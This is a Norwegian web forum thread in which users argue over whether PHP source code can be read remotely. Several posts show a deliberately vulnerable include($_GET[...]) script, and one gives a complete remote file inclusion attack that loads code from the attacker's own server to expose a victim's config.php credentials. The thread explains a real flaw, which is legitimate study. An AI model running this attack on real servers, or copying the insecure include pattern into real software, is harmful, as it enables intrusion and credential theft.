Gå til innhold

Lage passordbeskytta hjemmeside!

Wooho

Av Wooho
i Programmering og webutvikling

Anbefalte innlegg

Equerm

Equerm

Skrevet
Skrevet
Huff... jeg gir opp...
Apache er webserveren som blir brukt for internettsider, tror ikke home.no kjører IIS

Si meg, tror du det bare finnes to webserver software i verden?

Hva med Jetty, TUX webserver, Yaws og Nhttpd (For å nevene noen..)

7725753[/snapback]

Ok, jeg er klar over at det finnes flere, men jeg er ganske ganske sikker på at home.no bruker en av de 2 som er vanligst å bruke, enten Apache eller IIS

Lenke til kommentar

Videoannonse

Videoannonse
Annonse
Equerm

Equerm

Skrevet
Skrevet
Si meg, på en skala fra 1 til 10, hvor dum er du? :nei:

Ikke under noen omstendigheter kan du hente ut kilden til en php fil på en annen server.. Den eneste måten er om filen heter filnavn.phps eller om filen heter noe annet en .php og apache ikke er kofigurert til å definere dette som en php fil..

 

Det du sier om "usikkert include" script..

La oss si at scriptet ser slik ut

<?php
if(!file_exists($_GET['side'])) {
include("error.php");
} else {
include($_GET['side']);
}
?>

(Dette er forresten den vanligste feilen blant nybegynnere)

Om du skriver i adressefeltet index.php?side=enannenside.php

Så får du kun opp det som siden printer ut, ikke kildekoden til php'en...

 

Så jeg sier igjen (Ikke for å være altfor streng :whistle: ), Hvor dum er du?

7725734[/snapback]

Jeg sa ikke noe om at man får opp kildekoden til filen med å bruke det der, det er jeg fullt klar over, men det er mulig å laste ned filene for så å sjekke kildekoden

 

Jeg kan ivertfall si at jeg er minst 1 hakk mindre dum enn deg

Lenke til kommentar
Stian Jacobsen

Stian Jacobsen

Skrevet
Skrevet
Si meg, på en skala fra 1 til 10, hvor dum er du? :nei:

Ikke under noen omstendigheter kan du hente ut kilden til en php fil på en annen server.. Den eneste måten er om filen heter filnavn.phps eller om filen heter noe annet en .php og apache ikke er kofigurert til å definere dette som en php fil..

 

Det du sier om "usikkert include" script..

La oss si at scriptet ser slik ut

<?php
if(!file_exists($_GET['side'])) {
include("error.php");
} else {
include($_GET['side']);
}
?>

(Dette er forresten den vanligste feilen blant nybegynnere)

Om du skriver i adressefeltet index.php?side=enannenside.php

Så får du kun opp det som siden printer ut, ikke kildekoden til php'en...

 

Så jeg sier igjen (Ikke for å være altfor streng :whistle: ), Hvor dum er du?

7725734[/snapback]

Jeg sa ikke noe om at man får opp kildekoden til filen med å bruke det der, det er jeg fullt klar over, men det er mulig å laste ned filene for så å sjekke kildekoden

 

Jeg kan ivertfall si at jeg er minst 1 hakk mindre dum enn deg

7725815[/snapback]

 

Nei, du kan ikke laste ned kildekoden til en php fil. Da må du isåfall ha FTP tilgang til den serveren filen ligger. Eller som jeg sa, at filen heter noe annet en ".php" og apache eller anndre webservere ikke er konfigurert til å gjenkjenne filtypen som en php-fil.

Lenke til kommentar
Ståle

Ståle

Skrevet
Skrevet (endret)
Du kan kjøre en fil på servern som lager et zip arkiv av f.eks en mappe, så kan du laste ned den mappen...

7726474[/snapback]

 

Det var da ikke dette tråden begynte med. Du påsto at med et lite sikkert include script, kunne du se kilden til en php fil..

7727501[/snapback]

 

! ! ! <-- Edit; tre utropstegn

include($_GET['side']);

 

 

FARLIG_FFS.php <-- PHP side

<?php 
show_source($_GET['hemmeligside']);
?>

 

:o

Endret av Ståle
Lenke til kommentar
ZoRaC

ZoRaC

Skrevet
Skrevet (endret)

Ikke for å "kapre" tråden, men må bare oppklare det der med "det er ikke mulig så se kilden til PHP-filer" diskusjonen.

 

Eksempel:

www.dinserver.no <--- din hjemmeside ligger her

www.minserver.no <--- min hjemmeside ligger her

 

Du har f.eks denne (http://dinserver.no/config.php):

<?php

$user = "brukernavn;

$pass = "passord";

?>

Åpner du http://dinserver.no/config.php får du bare en blank side - greit nok. :)

 

I filen dinserver.no/index.php:

<?php

include($_GET['fil']);

?>

 

I minserver.no/hacker.txt:

<?php

highlight_file($_GET['viskilde']);

?>

 

Så kjører jeg bare:

www.dinserver.no?fil=http://www.minserver.no/hack.php&viskilde=config.php

 

Og vips, så vises kilden til config.php (hvis safe_mode=off og allow_url_fopen=on, noe den er hos de fleste) ;)

 

Å kalle noen for "dum" synes jeg er drøyt, særlig når den som kommer med kommentaren tar fullstendig feil!

Endret av ZoRaC
Lenke til kommentar

Opprett en konto eller logg inn for å kommentere

Du må være et medlem for å kunne skrive en kommentar

Opprett konto

Det er enkelt å melde seg inn for å starte en ny konto!

Start en konto

Logg inn

Har du allerede en konto? Logg inn her.

Logg inn nå
Gå til emneliste
×
×
  • Opprett ny...